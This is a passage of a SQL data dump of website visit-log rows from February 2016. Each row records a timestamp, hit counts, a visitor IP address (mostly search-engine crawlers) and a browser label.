75576,1,1,0,0,'178.154.149.11','other'),(7921,1456375696,1,0,1,0,'68.180.229.232',''),(7922,1456375926,1,1,0,0,'51.255.65.84','other'),(7923,1456376305,1,1,0,0,'176.67.8.250','chrome'),(7924,1456376543,1,0,1,0,'66.249.78.151',''),(7925,1456376617,1,0,1,0,'68.180.229.232',''),(7926,1456377178,1,1,0,0,'207.46.13.43','other'),(7927,1456377724,1,0,1,0,'68.180.229.232',''),(7928,1456377898,1,0,1,0,'66.249.78.151',''),(7929,1456378058,1,1,0,0,'141.8.132.79','other'),(7930,1456378063,1,1,0,0,'141.8.183.14','other'),(7931,1456378088,1,1,0,0,'51.255.65.19','other'),(7932,1456378955,1,1,0,0,'207.46.13.114','other'),(7933,1456379052,1,1,0,0,'207.46.13.127','other'),(7934,1456379131,1,1,0,0,'93.158.152.26','other'),(7935,1456379243,1,1,0,0,'130.193.51.81','other'),(7936,1456379245,1,1,0,0,'141.8.132.97','other'),(7937,1456379249,1,1,0,0,'130.193.37.27','other'),(7938,1456379280,1,1,0,0,'62.210.215.100','chrome'),(7939,1456379430,1,0,1,0,'68.180.229.232',''),(7940,1456379772,7,7,0,0,'136.243.103.165','other'),(7941,1456380441,1,1,0,0,'207.46.13.43','other'),(7942,1456380917,1,1,0,0,'91.196.178.71','firefox'),(7943,1456381350,3,0,3,0,'68.180.229.232',''),(7944,1456381460,1,1,0,0,'141.8.142.88','other'),(7945,1456382374,2,2,0,0,'91.196.178.71','firefox'),(7946,1456382700,2,2,0,0,'91.196.178.68','chrome'),(7947,1456383062,1,1,0,0,'91.196.178.66','chrome'),(7948,1456383199,1,1,0,0,'207.46.13.43','other'),(7949,1456383256,1,1,0,0,'66.249.78.158','other'),(7950,1456383355,1,1,0,0,'66.249.66.166','other'),(7951,1456383533,1,1,0,0,'91.196.178.69','firefox'),(7952,1456383590,1,1,0,0,'8.29.198.25','other'),(7953,1456383603,1,1,0,0,'141.8.184.18','other'),(7954,1456383607,1,1,0,0,'141.8.183.14','other'),(7955,1456383745,2,2,0,0,'141.8.132.79','other'),(7956,1456383748,1,1,0,0,'37.53.76.152','chrome'),(7957,1456383783,2,0,2,0,'68.180.229.232',''),(7958,1456383833,1,1,0,0,'51.255.65.68','other'),(7959,1456383834,2,2,0,0,'141.8.142.88','other'),(7960,1456383891,1,1,0,0,'93.158.152.9','other'),(7961,1456383893,1,1,0,0,'5.255.253.53','other'),(7962,1456383898,1,1,0,0,'141.8.132.99','other'),(7963,1456383931,1,1,0,0,'78.111.190.20','firefox'),(7964,1456383951,1,1,0,0,'66.249.92.99','other'),(7965,1456384216,1,1,0,0,'91.196.178.72','chrome'),(7966,1456384281,1,0,1,0,'66.249.78.37',''),(7967,1456384327,1,1,0,0,'207.46.13.1','other'),(7968,1456384719,1,1,0,0,'66.249.66.166','other'),(7969,1456385118,1,1,0,0,'91.196.178.71','firefox'),(7970,1456385430,1,1,0,0,'141.8.132.99','other'),(7971,1456385504,1,1,0,0,'91.196.178.130','firefox'),(7972,1456385769,1,1,0,0,'141.8.184.18','other'),(7973,1456385845,1,1,0,0,'178.94.12.82','chrome'),(7974,1456385923,1,0,1,0,'66.249.66.158',''),(7975,1456386129,1,1,0,0,'66.102.9.94','firefox'),(7976,1456386622,1,1,0,0,'213.227.194.155','firefox'),(7977,1456386887,1,0,1,0,'66.249.78.144',''),(7978,1456387275,2,2,0,0,'141.8.184.18','other'),(7979,1456387445,1,1,0,0,'91.196.178.71','firefox'),(7980,1456387674,1,1,0,0,'37.55.57.178','chrome'),(7981,1456387898,1,1,0,0,'141.8.142.10','other'),(7982,1456387901,1,1,0,0,'130.193.51.81','other'),(7983,1456388305,1,1,0,0,'91.124.69.26','chrome'),(7984,1456388534,1,1,0,0,'207.46.13.127','other'),(7985,1456388594,1,1,0,0,'91.196.178.68','chrome'),(7986,1456388758,1,1,0,0,'37.115.220.54','chrome'),(7987,1456388811,1,1,0,0,'176.9.131.69','other'),(7988,1456389062,3,0,3,0,'68.180.229.232',''),(7989,1456389344,1,1,0,0,'94.178.229.134','chrome'),(7990,1456389375,1,1,0,0,'66.249.81.208','other'),(7991,1456389691,1,1,0,0,'207.46.13.1','other'),(7992,1456389823,1,1,0,0,'62.210.215.100','chrome'),(7993,1456390182,2,2,0,0,'80.91.162.99','other'),(7994,1456390248,3,3,0,0,'141.8.183.14','other'),(7995,1456390589,2,2,0,0,'141.8.132.99','other'),(7996,1456390860,2,2,0,0,'141.8.184.18','other'),(7997,1456390861,2,2,0,0,'178.154.149.11','other'),(7998,1456390866,1,1,0,0,'217.69.143.59','other'),(7999,1456391264,1,1,0,0,'91.196.178.131','chrome'),(8000,1456391325,1,1,0,0,'91.196.178.97','chrome'),(8001,1456391786,1,1,0,0,'194.187.216.46','firefox'),(8002,1456391864,1,1,0,0,'217.69.136.203','other'),(8003,1456391865,1,1,0,0,'141.8.183.14','other'),(8004,1456391870,1,1,0,0,'93.158.152.9','other'),(8005,1456392005,1,1,0,0,'176.120.60.231','chrome'),(8006,1456392074,1,1,0,0,'5.255.253.100','other'),(8007,1456392101,1,1,0,0,'66.249.78.158','other'),(8008,1456392433,1,1,0,0,'217.69.133.249','other'),(8009,1456392824,1,1,0,0,'78.111.187.148','chrome'),(8010,1456392875,1,1,0,0,'66.249.81.205','other'),(8011,1456392983,1,1,0,0,'91.196.178.72','chrome'),(8012,1456393466,1,1,0,0,'91.196.178.101','chrome'),(8013,1456393510,1,1,0,0,'37.55.162.189','chrome'),(8014,1456393556,1,1,0,0,'207.46.13.1','other'),(8015,1456393788,4,0,4,0,'68.180.229.232',''),(8016,1456394133,1,1,0,0,'66.249.78.158','other'),(8017,1456394157,1,1,0,0,'91.196.178.65','chrome'),(8018,1456394203,2,2,0,0,'207.46.13.114','other'),(8019,1456394432,1,1,0,0,'8.29.198.25','other'),(8020,1456394819,1,1,0,0,'93.158.152.203','other'),(8021,1456394862,1,1,0,0,'66.249.92.95','other'),(8022,1456395030,1,1,0,0,'95.135.53.232','chrome'),(8023,1456395135,1,1,0,0,'80.91.162.99','other'),(8024,1456395295,1,1,0,0,'130.193.37.27','other'),(8025,1456395515,2,2,0,0,'91.196.178.68','chrome'),(8026,1456395647,1,1,0,0,'213.227.194.155','firefox'),(8027,1456395932,1,0,1,0,'68.180.229.232',''),(8028,1456396012,1,1,0,0,'82.193.127.15','other'),(8029,1456396418,1,1,0,0,'195.22.108.134','chrome'),(8030,1456396786,1,1,0,0,'5.255.253.53','other'),(8031,1456397025,1,1,0,0,'91.196.178.66','chrome'),(8032,1456397196,1,1,0,0,'93.158.152.9','other'),(8033,1456397524,1,1,0,0,'91.196.178.68','firefox'),(8034,1456397939,1,1,0,0,'91.196.178.71','firefox'),(8035,1456398064,1,1,0,0,'91.196.179.69','chrome'),(8036,1456398241,1,0,1,0,'66.249.66.133',''),(8037,1456398435,1,1,0,0,'46.201.191.175','chrome'),(8038,1456398520,1,1,0,0,'37.53.89.22','chrome'),(8039,1456398547,1,1,0,0,'51.255.65.8','other'),(8040,1456398850,1,1,0,0,'37.55.227.111','firefox'),(8041,1456399049,1,1,0,0,'141.8.184.22','other'),(8042,1456399053,1,1,0,0,'141.8.142.88','other'),(8043,1456399287,1,1,0,0,'141.8.132.109','other'),(8044,1456399291,1,1,0,0,'141.8.142.60','other'),(8045,1456399295,1,1,0,0,'5.255.253.17','other'),(8046,1456399322,1,1,0,0,'91.196.178.68','firefox'),(8047,1456399441,2,2,0,0,'100.43.85.22','other'),(8048,1456399667,2,0,2,0,'68.180.229.232',''),(8049,1456400092,11,11,0,0,'141.8.184.18','other'),(8050,1456400228,1,1,0,0,'66.249.81.211','other'),(8051,1456401071,1,1,0,0,'217.69.133.222','other'),(8052,1456401202,1,1,0,0,'217.69.133.6','other'),(8053,1456401384,26,26,0,0,'141.8.184.18','other'),(8054,1456401405,3,3,0,0,'141.8.132.99','other'),(8055,1456401409,13,13,0,0,'178.154.149.11','other'),(8056,1456401421,8,8,0,0,'141.8.183.14','other'),(8057,1456401425,8,8,0,0,'93.158.152.9','other'),(8058,1456401435,1,1,0,0,'78.111.187.186','chrome'),(8059,1456401487,8,8,0,0,'5.255.253.53','other'),(8060,1456401491,2,2,0,0,'141.8.184.11','other'),(8061,1456401495,2,2,0,0,'141.8.142.88','other'),(8062,1456401509,4,4,0,0,'141.8.142.41','other'),(8063,1456401517,1,1,0,0,'141.8.132.2','other'),(8064,1456401529,5,5,0,0,'5.255.253.110','other'),(8065,1456401533,4,4,0,0,'93.158.152.26','other'),(8066,1456401547,5,5,0,0,'5.255.253.100','other'),(8067,1456401550,4,4,0,0,'5.255.253.55','other'),(8068,1456401555,3,3,0,0,'130.193.51.45','other'),(8069,1456401559,3,3,0,0,'130.193.51.43','other'),(8070,1456401567,5,5,0,0,'130.193.37.27','other'),(8071,1456401580,2,2,0,0,'141.8.142.10','other'),(8072,1456401589,2,2,0,0,'130.193.51.102','other'),(8073,1456401623,4,4,0,0,'130.193.37.21','other'),(8074,1456401631,4,4,0,0,'5.255.253.30','other'),(8075,1456401676,1,1,0,0,'141.8.184.22','other'),(8076,1456401686,1,1,0,0,'130.193.51.81','other'),(8077,1456401688,2,2,0,0,'141.8.132.79','other'),(8078,1456401702,3,3,0,0,'5.255.253.9','other'),(8079,1456401704,1,1,0,0,'5.255.253.10','other'),(8080,1456401729,1,1,0,0,'91.196.178.163','firefox'),(8081,1456401742,1,1,0,0,'141.8.132.97','other'),(8082,1456401755,1,1,0,0,'141.8.132.76','other'),(8083,1456402379,1,1,0,0,'178.93.28.163','chrome'),(8084,1456402415,1,1,0,0,'62.210.215.100','chrome'),(8085,1456402477,1,1,0,0,'5.255.253.100','other'),(8086,1456402648,1,1,0,0,'37.52.16.3','chrome'),(8087,1456402771,1,1,0,0,'93.158.152.9','other'),(8088,1456402935,1,1,0,0,'46.201.93.149','chrome'),(8089,1456403005,2,2,0,0,'95.133.110.222','chrome'),(8090,1456403278,2,2,0,0,'5.255.253.10','other'),(8091,1456403316,1,0,1,0,'66.249.78.151',''),(8092,1456403453,1,1,0,0,'66.249.78.151','other'),(8093,1456403536,1,1,0,0,'207.46.13.1','other'),(8094,1456403539,3,3,0,0,'141.8.142.88','other'),(8096,1456403747,1,1,0,0,'66.249.81.208','other'),(8097,1456403931,3,3,0,0,'130.193.37.21','other'),(8098,1456403932,3,3,0,0,'141.8.132.2','other'),(8099,1456403933,1,1,0,0,'5.255.253.94','other'),(8100,1456403934,3,3,0,0,'130.193.51.81','other'),(8101,1456403940,7,7,0,0,'141.8.184.18','other'),(8103,1456403941,6,6,0,0,'141.8.132.99','other'),(8104,1456403942,6,6,0,0,'130.193.51.43','other'),(8105,1456403943,5,5,0,0,'141.8.184.11','other'),(8106,1456403944,4,4,0,0,'5.255.253.9','other'),(8107,1456403945,3,3,0,0,'141.8.184.22','other'),(8109,1456403946,4,4,0,0,'5.255.253.30','other'),(8110,1456403947,5,5,0,0,'141.8.132.76','other'),(8111,1456403948,2,2,0,0,'141.8.132.79','other'),(8112,1456403949,7,7,0,0,'130.193.37.27','other'),(8113,1456403950,4,4,0,0,'141.8.142.41','other'),(8114,1456403951,4,4,0,0,'130.193.51.85','other'),(8115,1456403953,14,14,0,0,'178.154.149.11','other'),(8116,1456403955,10,10,0,0,'141.8.183.14','other'),(8118,1456403956,9,9,0,0,'5.255.253.53','other'),(8119,1456403958,5,5,0,0,'5.255.253.100','other'),(8121,1456403963,2,2,0,0,'130.193.51.102','other'),(8123,1456403964,5,5,0,0,'5.255.253.55','other'),(8124,1456403967,3,3,0,0,'93.158.152.9','other'),(8125,1456404170,7,7,0,0,'5.255.253.110','other'),(8126,1456404173,9,9,0,0,'141.8.142.10','other'),(8127,1456404176,6,6,0,0,'130.193.51.45','other'),(8128,1456404181,1,1,0,0,'141.8.132.48','other'),(8129,1456404182,4,4,0,0,'141.8.142.8','other'),(8130,1456404188,1,1,0,0,'93.158.152.26','other'),(8131,1456404212,1,1,0,0,'5.255.253.10','other'),(8132,1456404213,2,2,0,0,'141.8.132.97','other'),(8133,1456404217,1,1,0,0,'5.255.253.103','other'),(8134,1456404229,1,1,0,0,'130.193.51.22','other'),(8135,1456404238,1,1,0,0,'93.158.152.65','other'),(8136,1456404249,1,1,0,0,'141.8.132.66','other'),(8137,1456404302,1,1,0,0,'217.69.136.210','other'),(8138,1456405197,1,1,0,0,'178.154.149.11','other'),(8139,1456405198,1,1,0,0,'5.255.253.55','other'),(8140,1456405289,1,1,0,0,'8.29.198.25','other'),(8141,1456405326,1,1,0,0,'5.255.253.30','other'),(8142,1456405486,1,1,0,0,'178.92.178.217','firefox'),(8143,1456405527,1,1,0,0,'95.132.120.203','chrome'),(8144,1456405561,1,1,0,0,'66.249.92.99','other'),(8145,1456405810,1,1,0,0,'91.196.178.100','firefox'),(8146,1456405935,69,69,0,0,'207.46.13.43','other'),(8147,1456405986,76,76,0,0,'207.46.13.1','other'),(8148,1456406044,74,74,0,0,'207.46.13.114','other'),(8149,1456406089,1,1,0,0,'93.171.243.86','chrome'),(8150,1456406117,1,1,0,0,'91.196.178.40','chrome'),(8151,1456406176,1,1,0,0,'5.255.253.100','other'),(8152,1456406180,3,3,0,0,'130.193.37.21','other'),(8153,1456406185,5,5,0,0,'141.8.183.14','other'),(8154,1456406186,6,6,0,0,'141.8.184.18','other'),(8155,1456406190,4,4,0,0,'93.158.152.9','other'),(8156,1456406205,5,5,0,0,'5.255.253.53','other'),(8157,1456406211,1,1,0,0,'130.193.51.45','other'),(8158,1456406213,2,2,0,0,'141.8.132.99','other'),(8159,1456406219,2,2,0,0,'178.154.149.11','other'),(8160,1456406389,75,75,0,0,'207.46.13.127','other'),(8161,1456407086,1,0,1,0,'66.249.78.151',''),(8162,1456408342,1,0,1,0,'68.180.229.232',''),(8163,1456408416,1,1,0,0,'45.32.131.61','chrome'),(8164,1456408649,1,1,0,0,'91.196.178.169','chrome'),(8165,1456408862,1,0,1,0,'66.249.78.151',''),(8166,1456409030,5,5,0,0,'178.154.149.11','other'),(8167,1456409031,6,6,0,0,'141.8.184.18','other'),(8168,1456409032,2,2,0,0,'93.158.152.9','other'),(8169,1456409034,1,1,0,0,'141.8.183.14','other'),(8170,1456409137,1,1,0,0,'91.203.25.18','chrome'),(8171,1456409387,1,0,1,0,'68.180.229.232',''),(8172,1456409497,5,5,0,0,'5.9.89.170','other'),(8173,1456410264,273,273,0,0,'178.151.143.163','other'),(8174,1456410917,1,1,0,0,'66.249.81.205','other'),(8175,1456410966,1,1,0,0,'37.55.225.150','opera'),(8176,1456410987,1,1,0,0,'91.196.178.68','other'),(8177,1456411265,1,1,0,0,'95.135.9.78','chrome'),(8178,1456411471,1,1,0,0,'178.154.189.203','other'),(8179,1456411825,1,1,0,0,'91.196.178.72','chrome'),(8180,1456411829,1,1,0,0,'141.8.132.97','other'),(8181,1456411831,1,1,0,0,'130.193.51.102','other'),(8183,1456412226,1,1,0,0,'37.53.89.22','chrome'),(8184,1456413219,1,1,0,0,'207.46.13.114','other'),(8185,1456413374,1,1,0,0,'91.196.178.68','chrome'),(8186,1456413390,1,1,0,0,'91.196.178.169','chrome'),(8187,1456413565,1,1,0,0,'91.196.178.129','firefox'),(8188,1456413682,3,0,3,0,'68.180.229.232',''),(8189,1456413978,1,1,0,0,'217.69.133.237','other'),(8190,1456414194,1,1,0,0,'62.210.215.100','chrome'),(8191,1456414558,1,1,0,0,'66.249.81.205','other'),(8192,1456414569,1,1,0,0,'207.46.13.1','other'),(8193,1456414746,1,1,0,0,'141.8.142.88','other'),(8194,1456414747,1,1,0,0,'5.255.253.30','other'),(8196,1456415119,1,0,1,0,'66.249.66.158',''),(8197,1456415354,1,1,0,0,'207.46.13.114','other'),(8198,1456416108,1,1,0,0,'8.29.198.25','other'),(8199,1456416227,1,1,0,0,'66.249.92.103','other'),(8200,1456416937,1,1,0,0,'141.8.132.2','other'),(8202,1456416938,2,2,0,0,'93.158.152.26','other'),(8203,1456416939,2,2,0,0,'141.8.184.11','other'),(8204,1456416940,2,2,0,0,'141.8.142.10','other'),(8205,1456416941,2,2,0,0,'5.255.253.9','other'),(8207,1456417218,1,1,0,0,'141.8.184.18','other'),(8208,1456417219,1,1,0,0,'130.193.37.21','other'),(8209,1456417220,1,1,0,0,'130.193.51.45','other'),(8210,1456417221,1,1,0,0,'5.255.253.10','other'),(8211,1456417224,1,1,0,0,'130.193.51.81','other'),(8212,1456417799,138,138,0,0,'80.91.162.99','other'),(8213,1456417807,1,1,0,0,'180.76.15.31','other'),(8214,1456418079,1,0,1,0,'66.249.78.144',''),(8215,1456418158,1,1,0,0,'66.249.81.211','other'),(8216,1456418184,1,1,0,0,'91.196.178.70','chrome'),(8217,1456419120,1,1,0,0,'104.236.88.99','other'),(8218,1456419688,1,1,0,0,'91.196.178.70','chrome'),(8219,1456419984,2,2,0,0,'5.255.253.10','other'),(8221,1456419985,2,2,0,0,'141.8.184.11','other'),(8222,1456419986,2,2,0,0,'141.8.142.10','other'),(8224,1456419987,1,1,0,0,'141.8.184.22','other'),(8225,1456419988,2,2,0,0,'141.8.132.97','other'),(8226,1456419989,1,1,0,0,'130.193.51.102','other'),(8227,1456420043,1,1,0,0,'217.69.143.44','other'),(8228,1456420244,1,1,0,0,'130.193.51.43','other'),(8229,1456420245,1,1,0,0,'141.8.132.2','other'),(8230,1456420246,1,1,0,0,'93.158.152.26','other'),(8231,1456420248,1,1,0,0,'5.255.253.9','other'),(8232,1456420249,1,1,0,0,'130.193.51.81','other'),(8233,1456420251,1,1,0,0,'5.255.253.55','other'),(8234,1456420314,1,0,1,0,'68.180.229.232',''),(8235,1456421432,1,1,0,0,'178.92.248.85','firefox'),(8236,1456421759,1,1,0,0,'66.249.81.205','other'),(8237,1456422092,1,1,0,0,'141.8.132.99','other'),(8238,1456422093,1,1,0,0,'141.8.132.76','other'),(8240,1456422813,1,1,0,0,'178.154.189.6','other'),(8242,1456422814,1,1,0,0,'5.255.253.94','other'),(8243,1456422815,1,1,0,0,'5.255.253.62','other'),(8245,1456422833,1,1,0,0,'141.8.142.60','other'),(8246,1456422835,1,1,0,0,'141.8.132.74','other'),(8248,1456422836,1,1,0,0,'130.193.50.22','other'),(8250,1456422837,1,1,0,0,'5.255.253.17','other'),(8251,1456423908,1,1,0,0,'40.77.167.4','other'),(8252,1456424054,163,163,0,0,'144.76.29.162','other'),(8253,1456424561,8,8,0,0,'82.193.127.15','other'),(8254,1456424582,1,0,1,0,'68.180.229.232',''),(8255,1456424687,1,1,0,0,'178.92.248.85','firefox'),(8256,1456424814,6,6,0,0,'40.77.167.4','other'),(8257,1456425590,1,0,1,0,'68.180.229.232',''),(8258,1456425825,1,1,0,0,'178.154.189.6','other'),(8259,1456425826,1,1,0,0,'5.255.253.94','other'),(8260,1456425827,1,1,0,0,'141.8.132.109','other'),(8261,1456425828,2,2,0,0,'141.8.184.31','other'),(8262,1456425829,1,1,0,0,'141.8.142.60','other'),(8264,1456425830,1,1,0,0,'130.193.50.22','other'),(8265,1456425831,2,2,0,0,'141.8.184.6','other'),(8266,1456426139,1,1,0,0,'141.8.132.74','other'),(8267,1456426140,1,1,0,0,'93.158.152.65','other'),(8268,1456426141,1,1,0,0,'5.255.253.89','other'),(8269,1456426659,7,7,0,0,'80.91.162.99','other'),(8270,1456426967,1,1,0,0,'62.210.215.100','chrome'),(8271,1456426997,1,1,0,0,'8.29.198.26','other'),(8272,1456427303,1,1,0,0,'40.77.167.4','other'),(8273,1456427440,1,1,0,0,'66.249.92.99','other'),(8274,1456428689,1,1,0,0,'178.33.172.136','chrome'),(8275,1456428691,1,1,0,0,'93.158.152.9','other'),(8276,1456428695,1,1,0,0,'141.8.132.99','other'),(8277,1456428699,1,1,0,0,'130.193.51.43','other'),(8278,1456428704,1,1,0,0,'93.158.152.26','other'),(8279,1456428708,2,2,0,0,'5.255.253.9','other'),(8280,1456428712,1,1,0,0,'141.8.132.97','other'),(8281,1456428716,2,2,0,0,'5.255.253.30','other'),(8282,1456428720,1,1,0,0,'141.8.142.41','other'),(8283,1456428725,1,1,0,0,'178.154.149.11','other'),(8284,1456428729,1,1,0,0,'130.193.37.21','other'),(8285,1456428733,1,1,0,0,'130.193.51.45','other'),(8286,1456428737,1,1,0,0,'5.255.253.10','other'),(8287,1456428741,2,2,0,0,'141.8.184.11','other'),(8288,1456428840,1,1,0,0,'37.115.143.120','chrome'),(8289,1456428924,1,1,0,0,'141.8.142.10','other'),(8290,1456428933,1,1,0,0,'130.193.51.81','other'),(8291,1456428936,1,1,0,0,'141.8.184.22','other'),(8292,1456428941,1,1,0,0,'130.193.51.102','other'),(8293,1456428945,1,1,0,0,'5.255.253.110','other'),(8294,1456429567,2,2,0,0,'40.77.167.1','other'),(8295,1456429643,3,3,0,0,'144.76.29.162','other'),(8296,1456430120,5,5,0,0,'82.193.127.15','other'),(8297,1456430581,2,2,0,0,'130.193.51.85','other'),(8298,1456430582,1,0,1,0,'66.249.78.144',''),(8299,1456430585,2,2,0,0,'141.8.142.8','other'),(8300,1456430589,1,1,0,0,'178.154.149.11','other'),(8301,1456430994,1,1,0,0,'5.45.255.84','chrome'),(8302,1456431086,3,3,0,0,'80.91.162.99','other'),(8303,1456431191,4,4,0,0,'82.193.127.15','other'),(8304,1456431420,1,1,0,0,'141.8.184.18','other'),(8305,1456431455,1,1,0,0,'141.8.142.10','other'),(8306,1456431593,1,1,0,0,'91.196.178.135','chrome'),(8307,1456431704,1,1,0,0,'40.77.167.1','other'),(8308,1456432137,1,1,0,0,'185.76.70.150','chrome'),(8309,1456432503,2,0,2,0,'68.180.229.232',''),(8310,1456432688,1,1,0,0,'141.8.184.18','other'),(8311,1456432692,1,1,0,0,'178.154.149.11','other'),(8312,1456432697,1,1,0,0,'141.8.183.14','other'),(8313,1456432701,1,1,0,0,'130.193.37.21','other'),(8314,1456432706,1,1,0,0,'130.193.51.81','other'),(8315,1456432709,2,2,0,0,'141.8.132.76','other'),(8316,1456432759,1,1,0,0,'217.69.136.210','other'),(8317,1456432812,1,1,0,0,'130.193.51.102','other'),(8318,1456432817,1,1,0,0,'5.255.253.110','other'),(8319,1456432821,1,1,0,0,'141.8.142.88','other'),(8320,1456432825,1,1,0,0,'5.255.253.30','other'),(8321,1456432829,1,1,0,0,'5.255.253.55','other'),(8322,1456432838,1,1,0,0,'141.8.132.79','other'),(8323,1456434057,1,1,0,0,'194.44.158.225','msie'),(8324,1456434109,20,20,0,0,'136.243.36.97','other'),(8325,1456435024,35,35,0,0,'136.243.36.97','other'),(8326,1456435657,1,0,1,0,'66.249.78.151',''),(8327,1456435710,2,2,0,0,'130.193.51.81','other'),(8328,1456435714,1,1,0,0,'130.193.37.27','other'),(8329,1456435718,1,1,0,0,'141.8.132.2','other'),(8330,1456435722,1,1,0,0,'130.193.51.102','other'),(8331,1456435726,1,1,0,0,'91.196.178.71','chrome'),(8332,1456435882,1,1,0,0,'93.158.152.26','other'),(8333,1456435887,1,1,0,0,'141.8.142.10','other'),(8334,1456435891,1,1,0,0,'5.255.253.9','other'),(8335,1456435940,2,2,0,0,'136.243.36.97','other'),(8336,1456436120,1,0,1,0,'68.180.229.232',''),(8337,1456436161,1,1,0,0,'66.249.81.205','other'),(8338,1456436340,1,0,1,0,'66.249.66.166',''),(8339,1456436786,1,1,0,0,'40.77.167.3','other'),(8340,1456437057,1,1,0,0,'178.93.150.152','chrome'),(8341,1456437132,1,1,0,0,'188.163.5.62','chrome'),(8342,1456437855,1,1,0,0,'8.29.198.26','other'),(8343,1456438050,1,1,0,0,'78.111.185.41','chrome'),(8344,1456438149,1,1,0,0,'37.73.195.140','other'),(8345,1456438152,1,1,0,0,'130.193.51.109','other'),(8346,1456438156,1,1,0,0,'141.8.142.82','other'),(8347,1456438160,1,1,0,0,'178.154.149.9','other'),(8348,1456438358,1,1,0,0,'130.193.51.55','other'),(8349,1456438363,1,1,0,0,'5.255.253.89','other'),(8350,1456438370,1,1,0,0,'66.249.92.103','other'),(8351,1456438416,1,1,0,0,'40.77.167.4','other'),(8352,1456438695,1,1,0,0,'66.249.78.144','other'),(8353,1456438829,2,2,0,0,'51.255.194.3','other'),(8354,1456440575,1,1,0,0,'5.255.253.53','other'),(8355,1456440579,2,2,0,0,'141.8.184.22','other'),(8356,1456440583,2,2,0,0,'141.8.142.8','other'),(8357,1456440587,1,1,0,0,'141.8.132.44','other'),(8358,1456440745,1,1,0,0,'130.193.51.22','other'),(8359,1456440749,1,1,0,0,'130.193.51.91','other'),(8360,1456441481,1,1,0,0,'217.69.133.12','other'),(8361,1456442650,1,1,0,0,'62.210.215.100','chrome'),(8362,1456442744,1,1,0,0,'178.154.149.9','other'),(8363,1456442748,1,1,0,0,'141.8.142.10','other'),(8364,1456442826,1,1,0,0,'141.8.132.79','other'),(8365,1456442830,1,1,0,0,'141.8.132.74','other'),(8366,1456442834,1,1,0,0,'130.193.51.22','other'),(8367,1456443423,1,1,0,0,'37.146.69.241','opera'),(8368,1456443437,1,1,0,0,'66.249.81.205','other'),(8369,1456443446,1,1,0,0,'66.249.78.144','other'),(8370,1456443867,2,2,0,0,'91.228.197.248','chrome'),(8371,1456444533,1,1,0,0,'141.8.132.48','other'),(8372,1456444536,4,4,0,0,'141.8.184.6','other'),(8373,1456444726,1,1,0,0,'217.69.133.240','other'),(8374,1456444743,1,1,0,0,'207.46.13.161','other'),(8375,1456445097,97,97,0,0,'62.210.170.165','other'),(8376,1456445145,1,0,1,0,'68.180.229.232',''),(8377,1456445508,1,1,0,0,'40.77.167.4','other'),(8378,1456445529,300,300,0,0,'5.9.111.70','other'),(8379,1456446026,1,1,0,0,'66.249.78.158','other'),(8380,1456446764,1,0,1,0,'68.180.229.232',''),(8381,1456447211,1,1,0,0,'40.77.167.3','other'),(8382,1456447227,1,0,1,0,'66.249.78.151',''),(8383,1456447722,1,1,0,0,'207.46.13.161','other'),(8384,1456448591,1,1,0,0,'66.249.92.95','other'),(8385,1456448593,1,0,1,0,'66.249.78.158',''),(8386,1456448721,1,1,0,0,'8.29.198.26','other'),(8387,1456449291,1,1,0,0,'217.69.133.59','other'),(8388,1456449505,1,1,0,0,'217.69.133.194','other'),(8389,1456449661,1,1,0,0,'66.249.78.158','other'),(8390,1456450426,1,1,0,0,'207.46.13.161','other'),(8391,1456450781,1,1,0,0,'217.69.133.220','other'),(8392,1456451295,1,1,0,0,'217.69.133.193','other'),(8393,1456451462,1,1,0,0,'40.77.167.4','other'),(8394,1456452119,1,0,1,0,'66.249.78.144',''),(8395,1456452172,4,4,0,0,'141.8.184.18','other'),(8396,1456452176,3,3,0,0,'141.8.183.14','other'),(8397,1456452180,2,2,0,0,'93.158.152.9','other'),(8398,1456452282,3,3,0,0,'178.154.149.11','other'),(8399,1456452463,1,1,0,0,'180.76.15.5','other'),(8400,1456452465,1,1,0,0,'180.76.15.139','other'),(8401,1456453069,1,1,0,0,'40.77.167.4','other'),(8402,1456453491,1,0,1,0,'66.249.66.158',''),(8403,1456454008,1,1,0,0,'5.255.253.10','other'),(8404,1456454010,1,1,0,0,'130.193.51.102','other'),(8405,1456454015,1,1,0,0,'5.255.253.55','other'),(8406,1456454189,4,4,0,0,'178.151.143.163','other'),(8407,1456454336,1,0,1,0,'66.249.78.151',''),(8408,1456454759,1,1,0,0,'66.249.78.151','other'),(8409,1456454917,1,0,1,0,'66.249.78.144',''),(8410,1456454997,1,0,1,0,'66.249.78.158',''),(8411,1456455332,1,1,0,0,'141.8.142.8','other'),(8412,1456455336,1,1,0,0,'93.158.152.9','other'),(8413,1456455749,1,0,1,0,'66.249.78.151',''),(8414,1456455773,1,1,0,0,'141.8.183.14','other'),(8415,1456455777,1,1,0,0,'130.193.51.45','other'),(8416,1456456232,1,1,0,0,'66.249.78.144','other'),(8417,1456456287,1,1,0,0,'217.69.133.242','other'),(8418,1456456349,1,1,0,0,'62.210.215.100','chrome'),(8419,1456456477,1,1,0,0,'66.249.78.158','other'),(8420,1456456708,1,1,0,0,'40.77.167.1','other'),(8421,1456456830,1,1,0,0,'217.69.133.12','other'),(8422,1456457161,4,4,0,0,'66.249.78.151','other'),(8423,1456457213,1,0,1,0,'68.180.229.232',''),(8424,1456457440,1,1,0,0,'66.249.66.158','other'),(8425,1456457445,1,1,0,0,'66.102.9.84','firefox'),(8426,1456457447,1,1,0,0,'66.249.66.162','other'),(8427,1456457465,3,2,1,0,'66.249.78.144',''),(8428,1456457923,1,1,0,0,'141.8.132.99','other'),(8429,1456457926,1,1,0,0,'130.193.51.81','other'),(8430,1456458062,1,1,0,0,'141.8.183.14','other'),(8431,1456458066,1,1,0,0,'130.193.51.45','other'),(8432,1456458115,1,1,0,0,'217.69.133.12','other'),(8433,1456458200,1,1,0,0,'157.55.39.196','other'),(8434,1456458751,1,1,0,0,'66.249.78.144','other'),(8435,1456458834,1,0,1,0,'66.249.78.151',''),(8436,1456459172,1,0,1,0,'66.249.78.158',''),(8437,1456459181,1,1,0,0,'66.249.92.99','other'),(8438,1456459257,1,1,0,0,'66.249.78.151','other'),(8439,1456459258,1,1,0,0,'130.193.51.43','other'),(8440,1456459262,2,2,0,0,'93.158.152.26','other'),(8441,1456459266,1,1,0,0,'130.193.51.45','other'),(8442,1456459557,1,1,0,0,'8.29.198.26','other'),(8443,1456459580,1,1,0,0,'178.154.149.11','other'),(8444,1456459584,2,2,0,0,'141.8.183.14','other'),(8445,1456459589,1,1,0,0,'141.8.132.79','other'),(8446,1456459592,1,1,0,0,'141.8.132.99','other'),(8447,1456459596,1,1,0,0,'130.193.51.102','other'),(8448,1456459605,1,1,0,0,'5.255.253.9','other'),(8449,1456459609,1,1,0,0,'141.8.142.8','other'),(8450,1456459617,1,1,0,0,'130.193.37.27','other'),(8451,14564